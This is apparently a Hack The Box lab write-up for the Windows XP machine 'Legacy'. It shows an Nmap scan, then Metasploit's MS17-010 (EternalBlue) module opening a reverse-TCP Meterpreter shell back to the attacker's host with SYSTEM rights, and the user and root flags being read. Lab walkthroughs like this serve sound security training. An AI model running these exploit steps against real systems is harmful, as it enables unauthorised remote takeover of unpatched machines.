I first started by running NMap against the host to discover running services:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Nmap 7.80 scan initiated Tue Sep 15 14:12:48 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h29m49s, deviation: 2h07m16s, median: 4d22h59m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:df:de (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-20T23:14:42+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 15 14:15:43 2020 -- 1 IP address (1 host up) scanned in 175.19 seconds
We can see from this output that there are 2 ports open. 139 and 445. The SMB discovery script had also run and this service was running. Although there were no SMB shares.
Eternal Blue is one of the more common exploits for SMB, especially considering the OS is WinXP. I started Metasploit and loaded the MS17_010 exploit and ran it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
msf5 > use windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x82256da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... KpPkSPCi.exe
[*] 10.10.10.4:445 - Created \KpPkSPCi.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \KpPkSPCi.exe...
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.4:1033) at 2020-09-15 15:26:50 -0400
meterpreter >
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys
100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john
meterpreter > cd john
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 01:33:41 -0400 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 01:33:41 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 01:33:42 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:19:32 -0400 user.txt
meterpreter > cat user.txt
[REDACTED]
meterpreter >
From this output, you can see the exploit successfully ran and i was provided a meterpreter shell. From this shell i was able to browse to the Desktop under the John user and read the user flag.
I next tried to browse to the Adminstrator desktop and was successfully able to do this as well, allowing me to also capture the root flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 01:20:57 -0400 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:30 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 01:18:34 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:20:02 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-15 22:18:24 -0500 pagefile.sys
100666/rw-rw-rw- 0 fil 2020-09-20 17:03:03 -0400 pwned.txt
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 01:20:29 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 01:32:42 -0400 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 01:33:41 -0400 john
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 02:07:20 -0400 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 02:07:20 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 02:07:21 -0400 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 02:18:19 -0400 root.txt
meterpreter > cat root.txt
[REDACTED]
meterpreter >